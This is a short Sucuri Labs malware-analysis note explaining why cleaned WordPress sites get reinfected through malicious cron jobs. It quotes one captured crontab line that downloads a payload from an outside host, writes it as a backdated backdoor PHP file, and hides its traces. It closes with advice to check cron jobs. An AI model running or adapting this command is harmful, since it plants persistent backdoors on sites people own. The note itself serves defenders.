Sucuri Labs

Malicious Cron Jobs

You may remove malware from files and a database, close all security holes, change all passwords, but your site still gets reinfected regularly. It may be because you forgot to clean your crontab.

Here’s an example of a malicious cron job that creates a backdoor file in the /wp-includes/Text/Diff/Engine directory every other day:

DOWNLOAD_URL="hxxp://cpanel .jawebsolutions .com/u/w.gz"LOCAL_FILE_PATH="/home/username/public_html/wp-includes/Text/Diff/Engine/i18n.php"1 3 */2 * * rm -f /var/tmp/w.gz ; wget -q -O /var/tmp/w.gz $DOWNLOAD_URL && gunzip -c /var/tmp/w.gz > $LOCAL_FILE_PATH && touch -c -t 201007151834 $LOCAL_FILE_PATH && rm -f /var/tmp/w.gz

So don’t forget to check cron jobs in your hosting control panel or use the crontab -l command if you have SSH access.

Krasimir Konov

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.

Related Tags

Labs Note

Innocent Defacement

Cesar Anjos
March 13, 2020

When we talk about defacements, we’re usually referring to attacks leading to a visual takeover of a website’s page ― consider it a form of…

Read the Post

Side Effects of the Site_url Hack

Denis Sinegubko
November 20, 2018

We\’ve been cleaning many sites infected by the so-called site_url hack–the result of the WP GDPR Compliance plugin vulnerability. The sites are broken because their…

Read the Post

When Online Shopping leads to Malware download

Ahmad Azizan Idris
August 28, 2017

Recently, during an incident response process, we worked on an interesting Magento website. This site was reported to having a strange redirection when users visited…

Read the Post

array_diff_ukey Usage in Malware Obfuscation

Luke Leal
May 14, 2019

We discovered a PHP backdoor on a WordPress installation that contained some interesting obfuscation methods to keep it hidden from prying eyes: $zz1 = chr(95).chr(100).chr(101).chr(115).chr(116).chr(105).chr(110).chr(97).chr(116).chr(105).chr(111).chr(110);…

Read the Post

Email Scraper: Mass Mail Grabber from Database

Luke Leal
February 5, 2020

One of our Remediation team analysts, Liam Smith, discovered a malicious file on a client’s compromised WordPress website that demonstrates how attackers can use rudimentary…

Read the Post

Reversed URLs Randomly Redirect to Scams

Denis Sinegubko
December 14, 2017

We are seeing hundreds of infected WordPress sites with the following scripts (in one line) injected in random places in wp_posts table. $vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n])…

Read the Post

Sucuri Labs

Not that impressive hack tool

Luke Leal
December 27, 2016

There is often a misconception regarding the tools that attackers implement in their malicious activity, and that misconception is that they must be using advanced…

Read the Post

Real-Time Phishing Kit Targets Brazilian Central Bank

Luke Leal
January 14, 2021

We recently found an interesting phishing kit on a compromised website that has QR code capabilities, along with the ability to control the phishing page…

Read the Post

Fake relatable domain used to distribute ads

Krasimir Konov
April 26, 2019

Malicious users try to hide their malicious scripts in many ways these days, some more clever then others, in this case we look at a…

Read the Post

Tricky malvertising injections

Abdelli Nassereddine
May 10, 2017

When a website is compromised, one of the most interesting and challenging tasks we perform is identifying all malware to prevent attackers from regaining access…

Read the Post

Related Tags

Related Categories

You May Also Like